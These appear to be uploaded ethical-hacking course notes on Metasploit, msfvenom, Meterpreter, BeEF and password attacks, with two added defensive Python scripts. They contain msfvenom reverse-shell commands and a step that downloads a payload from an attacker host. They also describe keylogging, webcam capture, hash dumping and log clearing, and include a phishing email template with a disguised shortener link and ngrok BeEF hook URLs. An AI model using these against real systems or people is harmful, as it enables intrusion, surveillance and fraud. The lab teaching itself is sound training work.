System Hacking

Metasploit is a widely used exploitation framework that supports all phases of penetration testing, with two main versions: Metasploit Pro (commercial) and Metasploit Framework (open-source). The framework consists of various components including msfconsole, modules for exploits and payloads, and tools for vulnerability research. It is organized into seven major categories, each serving different functions in the hacking process, and includes commands for exploiting vulnerabilities in systems like WordPress.

Uploaded by

Aaradhana Parmar

40 Metasploit

25 July 2024 21:20

DAY 40 OF 75 DAYS ETHICAL HACKING COURSE

Metasploit is the most widely used exploitation framework. It is a powerful tool that can support all phases of a penetration testing engagement, from
information gathering to post-exploitation.

Metasploit has two main versions:


• Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
• Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, which is installed on the AttackBox and
on the most commonly used penetration testing Linux distributions.

The main components of the Metasploit Framework can be summarized as follows:


• msfconsole: The main command-line interface.
• Modules: Supporting modules such as exploits, scanners, payloads, etc.
• Tools: Stand-alone tools that help with vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom,
pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are tools useful in exploit
development, which is beyond the scope of this module.

MSFCONSOLE
msfconsole is the primary interface to the Metasploit framework. It is the command-line interface for the framework and
can be launched by typing msfconsole in the command line. This opens the msfconsole interface, in which we can use the
different Metasploit options and commands. A GUI tool for the Metasploit framework also exists: Armitage, which
is pre-installed in Kali Linux. The advantage of using msfconsole over the GUI is that we can run external
commands like ping, ifconfig, etc. in the interface itself and also get tab auto-completion.

How to install on Linux


➢ sudo apt install metasploit-framework
➢ sudo service postgresql start
➢ msfconsole
➢ db_status (inside msfconsole; it will show "not connected")
➢ So, exit msfconsole and run:
➢ sudo msfdb init
➢ msfconsole

Major Categories of Metasploit


Metasploit framework is built on 7 major categories each containing modules that can be used in each hacking phase. A brief
introduction to each of the 7 categories is given below:

Category 1: Exploit

Exploit is a piece of code that uses a vulnerability present in the target system. The exploit module is very neatly organized
and contains modules for all the known exploits for a vulnerability in any software/service.

Category 2: Auxiliary

Any module under this category is mostly used for scanning and information gathering. Modules like scanners, crawlers,
sniffers, etc. can be found here.

Category 3: Payload

Payloads are the code that will run on the target system. Exploit only leverages the vulnerability present in the system. But if
we want the exploit to have the result we would want (gaining access, installing a back door, popping up a reverse shell), we
need to use a payload.

Category 4: Post

Post contains all the modules that can be used for the post-exploitation phase.

Category 5: Encoders

The exploits or payloads we use against a target system can often be blocked by a target that runs a signature-
based anti-virus solution. Encoders are used to encode an exploit or payload in the hope that it goes undetected by the anti-virus.

Category 6: NOP (No Operation)

The modules in this category are used to provide a buffer that instructs the system to do literally nothing.

Category 7: Evasion

Even if we encode the exploits or payloads, evasion techniques can also be used above it to evade antivirus software.

Examples of Metasploit
System hacking Page 1


Below is a more understandable example of leveraging a vulnerability present in the WordPress site version 5.0 to access
the target system. An NMAP version scan (nmap -sV <IP>) on the target system reveals that the target system is running
WordPress version 5.0. Now let’s see some examples of the basic commands and the process used in msfconsole to exploit
the target system running WordPress 5.0.
Step 1: Searchsploit
Searchsploit is a command line search tool for Exploit-DB used to search for any publicly known exploits for a particular
operating system, application, or service running on the target system. The search result gives all the known exploit modules
which can be used in msfconsole to exploit and gain access to the target system.
msf6> searchsploit <software/service you want to exploit>
msf6> searchsploit wordpress 5.0

Step 2: Search
Searches module names and descriptions of exploits or payloads that can be used to leverage any known vulnerability for a
given service or application. Depending on the rank of the modules returned, we can pick the relevant exploit or payload and
use it for exploitation. In the example below, we also specified the kind of exploit that we wanted to use.
msf6 > search wordpress 5.0 crop image

Step 3: Use
The use command is used to select the exploit or payload module we are going to use against the vulnerable version of the
software or service. Once a module is selected, we can set the parameters of the host and target
machines that are needed for exploitation.
msf6> use exploit/multi/http/wp_crop_rce
The module can also be selected with the use command followed by the number (index) shown at the beginning of the
search result line.

Step 4: Info
The info command gives additional information about the module currently in use. It contains information such as the exploit
name, a description of the payload, the year it was disclosed, etc.
msf6 > info

Step 5: Show
show options is a command used to display all the parameters or environment variables that need to be set before exploiting a
target system. After selecting a suitable exploit with the use command, the tester is
required to set the IP address and port of the target system, and also the username and password for authentication into the
application if the target system is running an application like WordPress. The show options command lists all the required
parameters that need to be set before exploiting the target.
msf6 > show options

Step 6: Set
The set command is used in conjunction with the show command to set the necessary parameters, such as
LHOST, LPORT, RHOSTS, RPORT, username, and password. LHOST and LPORT refer to the attacking system's (in this case
our own) IP address and port. RHOSTS and RPORT refer to the target's IP and port.
msf6 > set LHOST 10.18.51.89
msf6 > set RHOSTS 10.10.36.242
msf6 > set USERNAME kwheel
msf6 > set PASSWORD cutiepie1

Step 7: run/exploit
This command is used to launch the exploit after successfully setting the required parameters. Depending on the payload, the
payload can pop up a reverse TCP shell or install a backdoor or gain a root shell.
msf6 > exploit



41 Advanced Metasploit
25 July 2024 21:28

Scanning
Port Scanning

Metasploit has a number of modules to scan open ports on the target system and network. You can list the available port scanning modules using the search portscan command.
Search portscan

msf6 > search portscan

Matching Modules
================

# Name Disclosure Date Rank Check Description


- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner

Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf6 >

Port scanning modules will require you to set a few options:

Portscan options

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax f'ile:'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

CONCURRENCY: Number of targets to be scanned simultaneously.


PORTS: Port range to be scanned. Please note that 1-1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most used ports, while Metasploit
will scan port numbers from 1 to 10000.
RHOSTS: Target or target network to be scanned.
THREADS: Number of threads that will be used simultaneously. More threads will result in faster scans.

You can also run Nmap scans directly from the msfconsole prompt, as shown below, which is faster:
Using Nmap from the Msfconsole prompt

msf6 > nmap -sS 10.10.12.229


[*] exec: nmap -sS 10.10.12.229

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-20 03:54 BST


Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
Host is up (0.0011s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
MAC Address: 02:CE:59:27:C8:E3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 64.19 seconds


msf6 >

As for information gathering, if your engagement requires a speedier approach to port scanning, Metasploit may not be your first choice. However, a number of modules make Metasploit a
useful tool for the scanning phase.

UDP Service Identification

The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP (User Datagram Protocol). As you can see below, this module will not conduct an
extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.
UDP scan

msf6 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 10.10.12.229->10.10.12.229 (1 hosts)


[*] Discovered NetBIOS on 10.10.12.229:137 (JON-PC::U :WORKGROUP::G :JON-PC::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :02:ce:59:27:c8:e3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/udp_sweep) >

SMB Scans

Metasploit offers several useful auxiliary modules that allow us to scan specific services. Below is an example for SMB. Especially useful in a corporate network would be smb_enumshares
and smb_version, but please spend some time identifying the scanners that the Metasploit version installed on your system offers.
SMB scan

When performing service scans, it is important not to omit more "exotic" services such as NetBIOS. NetBIOS (Network Basic Input Output System), similar to SMB, allows computers to
communicate over the network to share files or send files to printers. The NetBIOS name of the target system can give you an idea about its role and even importance (e.g. CORP-DC, DEVOPS,
SALES, etc.). You may also run across some shared files and folders that could be accessed either without a password or protected with a simple password (e.g. admin, administrator, root, toor,
etc.).

The Metasploit Database

Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.

You will first need to start the PostgreSQL database, which Metasploit will use with the following command:
systemctl start postgresql

Then you will need to initialize the Metasploit Database using the msfdb init command.

Starting Postgresql

root@attackbox:~# systemctl start postgresql


root@attackbox:~# msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

Then launch msfconsole and check the database status using the db_status command.
Checking the database status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. You can list available workspaces using the
workspace command.

Listing workspaces
msf6 > workspace
* default
msf6 >


Adding a workspace
msf6 > workspace -a tryhackme
[*] Added workspace: tryhackme
[*] Workspace: tryhackme
msf5 > workspace
default

Changing workspaces
msf6 > workspace
default

msf5 > workspace default


[*] Workspace: default
msf5 > workspace

* default
msf6 >

msf6 > workspace -h


Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r Rename workspace
workspace -h Show this help information
Different from regular Metasploit usage, once Metasploit is launched with a database, the help command will also show the Database Backend Commands menu.
Database backend commands
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
If you run an Nmap scan using the db_nmap command shown below, all results will be saved to the database.
The db_nmap command

msf6 > db_nmap -sV -p- 10.10.12.229


[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49162/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results athttps://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >
You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
Hosts and services
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 135 tcp msrpc open Microsoft Windows RPC
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.12.229 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229 3389 tcp ssl/ms-wbt-server open
10.10.12.229 49152 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49153 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49154 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49158 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49162 tcp msrpc open Microsoft Windows RPC
msf6 >
The hosts -h and services -h commands can help you become more familiar with available options.
Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.

You may want to look for low-hanging fruits such as:


• HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
• FTP: Could allow anonymous login and provide access to interesting files.
• SMB: Could be vulnerable to SMB exploits like MS17-010
• SSH: Could have default or easy to guess credentials
• RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.
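
A small triage script for the services table above, added here as an example that is not part of the course notes or of Metasploit: it parses rows in the layout the services command prints and flags the services this list names as common initial-access targets, together with the hardening follow-up an administrator would check for each. The sample rows and their version strings are constructed, not real scan results.

```python
"""Triage the `services` table that msfconsole prints from its database.

Added example (not from the course notes or the Metasploit project). It
parses rows in the layout shown above and flags the services the notes
single out as low-hanging fruit, so they can be prioritised for hardening.
The sample rows below are constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample in the layout of `msf6 > services` (not real results).
SAMPLE_SERVICES = """\
host          port   proto  name              state   info
----          ----   -----  ----              -----   ----
10.10.12.229  21     tcp    ftp               open    vsftpd 3.0.3
10.10.12.229  22     tcp    ssh               open    OpenSSH 7.2p2
10.10.12.229  80     tcp    http              open    Apache httpd 2.4.18
10.10.12.229  135    tcp    msrpc             open    Microsoft Windows RPC
10.10.12.229  445    tcp    microsoft-ds      open    Microsoft Windows 7 - 10 microsoft-ds
10.10.12.229  3389   tcp    ssl/ms-wbt-server open
10.10.12.229  8080   tcp    http-proxy        closed
"""


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


# Services the notes list as common targets, with the defensive follow-up.
EXPOSURE_RULES = {
    21: ("FTP", "anonymous login may expose files; disable anonymous access or retire FTP"),
    22: ("SSH", "default or guessable credentials; enforce key-based auth and lockout"),
    80: ("HTTP", "web app may carry injection/RCE bugs; patch and review the application"),
    443: ("HTTPS", "web app may carry injection/RCE bugs; patch and review the application"),
    445: ("SMB", "SMBv1 exposure (MS17-010); disable SMBv1, patch, block 445 at the perimeter"),
    3389: ("RDP", "BlueKeep / weak credentials; patch, require NLA, restrict to VPN"),
}

# One data row: host, port, proto, name, state and an optional info column.
_ROW = re.compile(
    r"^(\S+)\s+(\d+)\s+(tcp|udp)\s+(\S+)\s+(open|closed|filtered)(?:\s+(.*))?$"
)


def parse_services(text):
    """Turn the printed table into Service records, skipping header rows."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue  # header, separator or blank line
        host, port, proto, name, state, info = m.groups()
        rows.append(Service(host, int(port), proto, name, state, (info or "").strip()))
    return rows


def flag_exposures(services):
    """Return one finding per open TCP service that matches an exposure rule."""
    findings = []
    for svc in services:
        if svc.state != "open" or svc.proto != "tcp":
            continue
        rule = EXPOSURE_RULES.get(svc.port)
        if rule:
            label, advice = rule
            findings.append({"host": svc.host, "port": svc.port,
                             "service": label, "advice": advice})
    return findings


if __name__ == "__main__":
    for f in flag_exposures(parse_services(SAMPLE_SERVICES)):
        print(f"{f['host']}:{f['port']} {f['service']}: {f['advice']}")
```

The rule table covers only the services named in the list above; msrpc on 135 is parsed but not flagged, and the closed 8080 row is skipped, which is the behaviour you want when feeding the script a full services dump.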

Exploitation
You can search for exploits using the search command, obtain more information about an exploit using the info command, and launch it using exploit. While the process itself is simple,
remember that a successful outcome depends on a thorough understanding of the services running on the target system.

Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other payloads you can use with that specific exploit.

Working with sessions



The sessions command will list all active sessions. The sessions command supports a number of options that will help you manage sessions better.

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many
different target systems (Apple, Windows, Android, Linux, etc.).

Encoders
Contrary to some beliefs, encoders do not aim to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While it can be effective against some
antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem. The example below shows the usage of encoding (with
the -e parameter): the PHP version of Meterpreter was encoded in Base64, and the output format was raw.

Handlers
Similar to exploits using a reverse shell, you will need to be able to accept the incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically
handled by the exploit module; you will remember how the payload options title appeared when setting a reverse shell. The term commonly used for receiving a connection from a target is
'catching a shell'. Reverse shells or Meterpreter callbacks generated by your MSFvenom payload can be easily caught using a handler.

The following scenario may be familiar: we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application). For the exercises in this task, you will need to
replicate a similar scenario on another target system; DVWA was used here for illustration purposes. The exploit steps are:
1. Generate the PHP shell using MSFvenom
2. Start the Metasploit handler
3. Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.0.2.19 is the IP address of the AttackBox used in the attack
and local port 7777 was chosen.

We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.
Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.
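
On the defender's side, the handler scenario above leaves a recognisable trace on the compromised host: an established outbound TCP connection owned by an interpreter such as php to an unusual port (7777 here). The following script, added as an example and not taken from the course notes or from Metasploit, applies that check to netstat -antp style output. The listing, hosts, PIDs and the 4444 port in it are constructed.

```python
"""Spot reverse-shell callbacks in a socket listing on the victim side.

Added example (not part of the notes or of Metasploit). A handler-style
callback shows up on the compromised host as an ESTABLISHED outbound TCP
connection owned by an interpreter or shell, usually to an unusual port.
The `netstat -antp` listing below is constructed.
"""
import re

# Constructed Linux `netstat -antp` output; addresses and PIDs are fictional.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      990/apache2
tcp        0      0 10.0.2.15:22            10.0.2.30:51522         ESTABLISHED 1120/sshd
tcp        0      0 10.0.2.15:44122         10.0.2.19:7777          ESTABLISHED 2231/php
tcp        0      0 10.0.2.15:38744         93.184.216.34:443       ESTABLISHED 1540/curl
tcp        0      0 10.0.2.15:38810         10.0.2.19:4444          ESTABLISHED 2290/python3
"""

# Interpreters and shells that rarely have a legitimate reason to hold an
# outbound TCP session of their own on a server.
INTERPRETERS = {"php", "python", "python2", "python3", "perl", "ruby",
                "bash", "sh", "dash", "nc", "ncat"}
# Remote ports where an outbound session from a server is commonly expected.
EXPECTED_REMOTE_PORTS = {22, 25, 53, 80, 443, 465, 587, 993, 995}

_LINE = re.compile(
    r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+(\S+)\s+(\d+)/(\S+)"
)


def parse_netstat(text):
    """Return dicts for rows that carry a PID/program column."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue  # header or a row without PID information
        proto, laddr, lport, raddr, rport, state, pid, prog = m.groups()
        rows.append({"proto": proto, "laddr": laddr, "lport": lport,
                     "raddr": raddr, "rport": rport, "state": state,
                     "pid": int(pid), "prog": prog})
    return rows


def suspicious_callbacks(text):
    """ESTABLISHED sessions owned by an interpreter, scored by remote port."""
    hits = []
    for c in parse_netstat(text):
        if c["state"] != "ESTABLISHED" or c["rport"] == "*":
            continue
        if c["prog"].lower() not in INTERPRETERS:
            continue
        rport = int(c["rport"])
        # An interpreter talking to an unusual port is the classic callback shape;
        # one talking to 443 still deserves a look, so it is reported at medium.
        severity = "high" if rport not in EXPECTED_REMOTE_PORTS else "medium"
        hits.append({"pid": c["pid"], "prog": c["prog"],
                     "remote": f"{c['raddr']}:{rport}", "severity": severity})
    return hits


if __name__ == "__main__":
    for h in suspicious_callbacks(SAMPLE_NETSTAT):
        print(f"[{h['severity']}] pid {h['pid']} ({h['prog']}) -> {h['remote']}")
```

sshd and curl are ignored because they are expected to hold sessions; the php and python3 processes are reported because a web server's interpreter should not be originating TCP connections at all, let alone to a high, non-service port. The same logic works on ss -tnp output with a small change to the regular expression.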



Other Payloads
Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few
examples you will often use.
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.

Linux Executable and Linkable Format (elf)


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target
machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by
typing ./shell.elf on the target machine command line.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

Now test on Metasploitable 2

➢ Create the payload
➢ Run a Python web server (python3 -m http.server 9000)
➢ Download it on the target (wget http://attackerip:9000/payload) and run it using bash
➢ Before that, start the listener for the Linux Meterpreter payload linux/x86/meterpreter/reverse_tcp

Introduction to Meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a
command and control architecture. You will interact with the target operating system and files using Meterpreter's specialized commands.

Meterpreter has many versions which will provide different functionalities based on the target system.

How does Meterpreter work?


Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus
scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet). Meterpreter runs in memory (RAM, Random Access Memory) to
avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and will not have a file on the target system.

Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the
server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming into and going out of the local
network, IPS and IDS solutions will not be able to detect its activities.

While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.

The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different
in your case. We have used the getpid command, which returns the process ID under which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify
running processes. All processes running in Linux or Windows have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be
stopped).

Meterpreter Flavors

Meterpreter Commands

Meterpreter will provide you with three primary categories of tools:


• Built-in commands
• Meterpreter tools
• Meterpreter scripting
If you run the help command, you will see Meterpreter commands are listed under different categories.
• Core commands
• File system commands
• Networking commands
• System commands
• User interface commands
• Webcam commands
• Audio output commands
• Elevate commands
• Password database commands
• Timestomp commands

Meterpreter commands

Core commands

Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands by running the help
command once a Meterpreter session has started.

• background: Backgrounds the current session
• exit: Terminate the Meterpreter session
• guid: Get the session GUID (Globally Unique Identifier)
• help: Displays the help menu
• info: Displays information about a Post module
• irb: Opens an interactive Ruby shell on the current session
• load: Loads one or more Meterpreter extensions
• migrate: Allows you to migrate Meterpreter to another process
• run: Executes a Meterpreter script or Post module
• sessions: Quickly switch to another session

File system commands


• cd: Will change directory
• ls: Will list files in the current directory (dir will also work)
• pwd: Prints the current working directory
• edit: will allow you to edit a file
• cat: Will show the contents of a file to the screen
• rm: Will delete the specified file
• search: Will search for files
• upload: Will upload a file or directory
• download: Will download a file or directory

Networking commands
• arp: Displays the host ARP (Address Resolution Protocol) cache
• ifconfig: Displays network interfaces available on the target system
• netstat: Displays the network connections
• portfwd: Forwards a local port to a remote service
• route: Allows you to view and modify the routing table

System commands
• clearev: Clears the event logs
• execute: Executes a command
• getpid: Shows the current process identifier
• getuid: Shows the user that Meterpreter is running as
• kill: Terminates a process
• pkill: Terminates processes by name
• ps: Lists running processes
• reboot: Reboots the remote computer
• shell: Drops into a system command shell
• shutdown: Shuts down the remote computer
• sysinfo: Gets information about the remote system, such as OS

Other commands (these will be listed under different menu categories in the help menu)
• idletime: Returns the number of seconds the remote user has been idle
• keyscan_dump: Dumps the keystroke buffer
• keyscan_start: Starts capturing keystrokes
• keyscan_stop: Stops capturing keystrokes
• screenshare: Allows you to watch the remote user's desktop in real time
• screenshot: Grabs a screenshot of the interactive desktop
• record_mic: Records audio from the default microphone for X seconds
• webcam_chat: Starts a video chat
• webcam_list: Lists webcams
• webcam_snap: Takes a snapshot from the specified webcam
• webcam_stream: Plays a video stream from the specified webcam
• getsystem: Attempts to elevate your privilege to that of local system
• hashdump: Dumps the contents of the SAM database

Post-Exploitation with Meterpreter

The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. Are you an admin
level user like NT AUTHORITY\SYSTEM or a regular user?)

Migrate
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and
start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make
Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.

Hashdump
The hashdump command will list the content of the SAM database. The SAM (Security Account Manager) database stores users' password hashes on Windows systems. These hashes are stored in
the NTLM (New Technology LAN Manager) format.

EternalBlue is an exploit allegedly developed by the U.S. National Security Agency (NSA) for a vulnerability affecting the SMBv1 server on numerous Windows systems. SMB (Server
Message Block) is widely used in Windows networks for file sharing and even for sending files to printers. EternalBlue was leaked by the cybercriminal group "Shadow Brokers" in April 2017. In
May 2017, this vulnerability was exploited worldwide in the WannaCry ransomware attack.

42 - BeEF
23 August 2024 21:44

DAY 42 OF 75 DAYS ETHICAL HACKING COURSE
Here is the step by step:

http://127.0.0.1:3000/demos/butcher/index.html
http://127.0.0.1:3000/ui/panel

/demos/butcher/index.html
https://9e37-122-161-73-149.ngrok-free.app/

24 August 2024 22:08

43 Metasploit + BeEF
25 August 2024 21:42

DAY 43 OF 75 DAYS ETHICAL HACKING COURSE

https://63d3-122-161-76-174.ngrok-free.app/demos/butcher/index.html

https://howshorts.com-agency@da.gd/cG4v95

Hello dear sir/ma'am

We are from a marketing company and we have product blablabla blaa blablabn

Here is our portfolio in case you want to see
https://howshorts.com-agency@da.gd/cG4v95

Thank you
Best regards

Team marketing

44 Password cracking
26 August 2024 21:41

DAY 44 OF 75 DAYS ETHICAL HACKING COURSE

2. Gaining Access - Uses the information gathered to exploit the system
○ Password Attacks:
▪ Non-electronic attacks
▪ Active online attacks
▪ Passive online attacks
▪ Offline attacks
3. Escalating Privileges - Granting the account you've compromised admin rights, or pivoting to an admin account
4. Executing Applications - Putting back doors into the system so that you can maintain access
5. Hiding Files - Making sure the files you leave behind are not discoverable
6. Covering Tracks - Cleaning up everything else (log files, etc.)
○ clearev - Meterpreter command to clear the Windows event logs (issued inside a Meterpreter session in the Metasploit Framework)
○ Clear the MRU (most recently used) lists in Windows
○ In Linux, prefix a file name with a dot to hide it

Password Attacks

Non-electronic - Non-technical attacks.

• Social engineering attacks - most effective.
• Shoulder surfing
• Dumpster diving
• Snooping around
• Guessing

Active online - done by directly communicating with the victim's machine.

• Includes dictionary and brute-force attacks, hash injection, phishing, Trojans, spyware, keyloggers and password guessing
• Keylogging - the process of using a hardware device or software application to capture a user's keystrokes
• Active online attacks are easier to detect and take longer
• Tools for Active Online Attack:
○ Medusa
○ Hydra
○ NBNSpoof
○ Pupy
○ Metasploit
• Can combine "net" commands with a tool such as the NetBIOS Auditing Tool or Legion to automate the testing of user IDs and passwords
○ Tools for NetBIOS attack:
▪ Hydra
▪ Metasploit

Passive online - Sniffing the wire in hopes of intercepting a password in clear text, or attempting a replay attack or man-in-the-middle attack

• Tools for Passive Online Attack:
○ Cain and Abel - Can poison ARP and then monitor the victim's traffic; also used for cracking password hashes (LM, NTLM), sniffing network packets for passwords, recovering locally stored passwords, etc.
○ Ettercap - MITM tool for LANs and DNS spoofer; supports attacks against SSL-protected traffic; intercepts the traffic on a network segment, captures passwords, and conducts active eavesdropping against a number of common protocols.
